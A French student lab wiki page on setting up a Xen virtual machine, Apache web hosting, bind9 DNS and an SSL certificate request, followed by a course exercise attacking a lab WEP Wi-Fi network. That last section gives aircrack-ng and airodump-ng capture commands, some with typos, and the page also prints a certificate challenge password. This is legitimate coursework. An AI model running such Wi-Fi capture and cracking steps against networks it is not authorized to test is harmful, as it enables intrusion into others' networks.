      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
